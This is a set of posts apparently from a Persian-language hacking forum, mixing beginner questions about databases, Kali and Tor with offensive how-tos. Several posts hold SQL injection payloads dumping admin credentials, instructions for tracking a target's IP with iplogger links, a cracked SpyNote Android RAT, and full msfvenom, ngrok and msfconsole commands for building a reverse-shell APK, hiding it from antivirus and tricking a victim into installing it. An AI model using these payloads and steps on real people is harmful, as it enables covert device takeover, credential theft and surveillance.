Dr.Gaster

سلام دوستان اقا من یوزر و پسورد یه سایتو بیرون کشیدم و دیدم که پسورد هش شده وقتی اون هشو تو hashid زدم بهم این ریزالت رو داد: CryptoCurrency(PrivateKey) این الگوریتم رو اصلا قبلا ندیده بودم و تو نت هم چیزی برای دیکریپت این هش نبود دوستان بنظرتون الان چطور ممکنه این هش رو دیکریپت کرد؟ $2y$11$223ce4f75b2f5ff4cf822u6EvAx1BV3kmQ5V7FqufuqF1FPit08lW اینم همون هش هستش...

[Hidden Content],group_concat(name,0x3a,email,0x3a,unm,0x3a,pwd),3,4,5+from+admin--+

[Hidden Content],2,3,4,group_concat(username,0x3a,password,0x3c62723e),6,7+from+sadmin_users--+

سلام دوستان درباره دیتابیس چندتا موضوع هست که نتونستم درکشون کنم اینکه ستون های دیتابیس درواقع چین و به چه دردی میخورن مخصوصا تو sql injetion چه کاربردی دارن ؟ و اینکه تیبل ها و جدول ها { که دارای اطلاعات هستن } درون ستون ها قرار میگیرن یا کلا کجا ذخیره میشن؟ و اینکه تمامی فایل های وب سایت درون دیتابیس ها ذخیره میشه؟ یا فقط بعضی از اطلاعات رو توش ذخیره میکنن؟ اخری هم اینکه این اطلاعات به صورت فایل تو دیتابیس ذخیره میشن یا به صورت نوشتاری هست؟ جواب این چنتا سوالو خیلی تو گوگل دربارش گشتم ولی متاسفانه پاسخ درست حسابی پیدا نکردم واسش اگه امکان داشت مثال هم بزنین ممنون میشم راهنماییم کنین 🙂

سلام دوست عزیز تو این تاپیک اسپای نوت رو قرار دادم میتونین استفاده کنین

سلام دوستان چن روز پیش متاسفانه رو پیسیم یه ویروس افتاد و هاردم فرمت شد در نتیجش هم ویندوزم هم کالی م { که دوال بوت کرده بودم } پاک شدن... لعنت به ویروس =-= الان دوباره ویندوز زدم و وقتی میخواستم با کالی دوال بوت کنم با خودم گفتم چرا از سیستم عامل های دیگه استفاده نکنم؟ مثل بلک ارک لینوکس! تا اینجایی که میدونم بلک ارک نسبت به کالی یکم سریعتره و ظاهرش قشنگتره و ابزار های خیلی زیادی داره... ولی مطمین نیستم کدوم رو بهتره استفاده کنم دوستان اگه تجربه یا نظری دارین خوشحال میشم راهنماییم کنین 🙂

سلام دوال بوت کرده بودین؟

سلام دوست عزیز بله از سایت iplogger.org استفاده کنین به این صورت : اول وارد سایت بشین و گزینه invisible image رو انتخاب کنین اگه براتون فرمی اورد برای تایید شرایط امنیتی اون رو بپذیرید بعد بهتون یه لینک میده با رنگ سبز که تو توضیحاتش هم نوشته : Your IPLogger link for collecting statistics اون لینک رو کپی و به تارگتتون بدین به محض اینکه روش کلیک کنه اطلاعاتش ثبت میشه وقتی مطمین شدین که تارگت رو لینک کلیک کرده گزینه Export ip's رو انتخاب کنین اونجا گزینه Create report رو انتخاب کنین و منتظر بمونین تا اماده شه بعدش جلوی اون گزارش دوتا گزینه میده بهتون که گزینه txt رو انتخاب کنین اینجوری واستون یه فایل txt دانلود میشه و توش میتونین شماره مدل دستگاه رو ببینین که اگه تو گوگل بزنین نوع گوشی رو میاره

سلام دوست عزیز معمولا اکثر رات های ویندوز دسترسی گرافیکی دارن میتونین ازشون استفاده کنین و پیلود رو به عکس بایند کنین تا کارتون راحتتر بشه { برای اینکار میتونین از ابزار DKMC استفاده کنین} اگه مشکلی در رابطه با رات ها داشتین میتونین تو انجمن سرچ کنین اگه هم مشکل باز ادامه داشت میتونین خصوصی پیام بدین تا راهنماییتون بکنم

سلام دوست عزیز اول اینکه مطمن هستید که سیستمتون هک شده؟ چه تغیرات غیرعادی تو سیستمتون مشاهده میکنین؟ و اینکه نظر شحصی من اینه که فتا به سیستم های شخصی رسیدگی نمیکنه بهتره یه انتی ویروس نصب کنین تا تهدیدات احتمالی رو از سیستمتون شناسایی و حذف کنه ولی اگه مشکل باز هم ادامه داشت شاید مجبور بشین سیستم رو ریست کنین و سیستم عاملتون رو از اول نصب کنین { برای اینکه روت کیت ها از بین برن}

سلام دوست عزیز اول بهتره بفهمید که ایا سایت هدف از کلودفلیر یا cdn های دیگه استفاده میکنه یا نه (برای اینکار یه راه خیلی ساده استفاده از افزونه Wappalyzer هستش که میتونین برای مرورگرتون نصب کنین و ازش استفاده کنین اطلاعات خوبی درباره هر سایتی نشون میده [Hidden Content] اینم لینکش برای کروم) اگه استفاده میکرد که باید دورش بزنین و بایپسش کنین چون اگه اون سایت رو پینگ کنین ایپی که میده بهتون فیکه و مال cdn عه اگه استفاده نمیکرد احتمالا ایپی درستی رو میده بهتون بهتره بعد از به دست اوردن ایپی رو اون رو با whois یه تستی بکنین یا از اسکریپت های Information Gatherning استفاده کنین تا name server هارو بفهمین و شاید این یه راهنمایی بکنه بهتون

سلام دوست عزیز اولا بگم خدمتتون که خیلی بهتره از رات ها استفاده کنین چون هم محیط گرافیکی دارن هم امکانات بیشتری دارن هم کار باهاشون راحت تره... واس همینم یکی از بهترین رات های اندروید رو همینجا اپلود میکنم تا اگه سیستم ویندوزی دارین اگه خواستین ازش استفاده کنین ( اسپای نوت spynote black.rarکرک شده هستش خودمم تست کردم هیچ مشکلی نداره ولی باید جاوا رو نصب کرده باشید) درباره اتصالات بین رات یا اصن پیلود msfvenome فرقی نمیکنه برای ایجاد این اتصالات من از ngrok استفاده میکنم چون راحت ترین راهه میتونین تو نت درباره نصبش سرچ کنین من اینجا با این دستور از ngrok استفاده میکنم: ngrok tcp 4444 اگه میخواین با متاسپلویت پیش برین با این دستورات: msfvenom -p android/meterpreter/reverse_tcp LHOST= [your ip or ngrok ] LPORT= [ngrok gives you port] R > /root/Desktop/yourpayload.apk خب اینجا پیلودتون رو ساختین الان اینو میتونین انکریپت کنین [تا توسط انتی ویروس شناسایی نشه] یا بایندش کنی به یه برنامه [اون برنامه حتما باید apk باشه ] تا هدفتون شک نکنه حالا این رو بفرستین به هدفتون و مطمین شین نصب کرده حالا نیاز دارید تا msfconsole رو باز کنین و با استفاده ازاون از تارگتتون دسترسی بگیرین برای این کار با دستورات زیر پیش میریم : msfcosole set PAYLOAD android/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 exploit تمام شد! فقط یه نقطه رو بگم... اگه از ngrok استفاده کنین هدفتون وقتی برنلمه رو نصب کرد باید وی...پی انش روشن باشه spynote black.rar spynote black.rar

سلام دوست عزیز دارک وب و دیپ وب استفاده های قانونی هم دارن

سلام دوستان راستش تور رو نصب کردم و دیدم ی صفحه اورد واسم که میخواید از پروکسی استفاده کنین یا نه (عکسشم قرار میدم واستون) اولش گزینه configure رو انتخاب کردم و هرسه گزینه رو تست کردم هیچکدوم بالا نیاورد مجبور شدم برگردم و v..pn روشن کنم و گزینه connect رو انتخاب کنم با این روش مشکلم برطرف شد و تور بالا اومد میخواستم بپرسم تور همینجوری هم امنه برای ورود به دارک وب و دیپ وب؟ یا بهتره از گزینه configure استفاده کنم؟

سلام دوست عزیز... تا جایی که من میدونم با بروت فورس چنتا اکانتو کرک میکنن و این به شانستون بستگی داره که اون اکانتا اون دوره رو خریده باشن یا نه روش دوم هم اسیب پذیری های سایت هست مثلا با کامند اینجکشن به فیلم های دوره دسترسی پیدا میکنن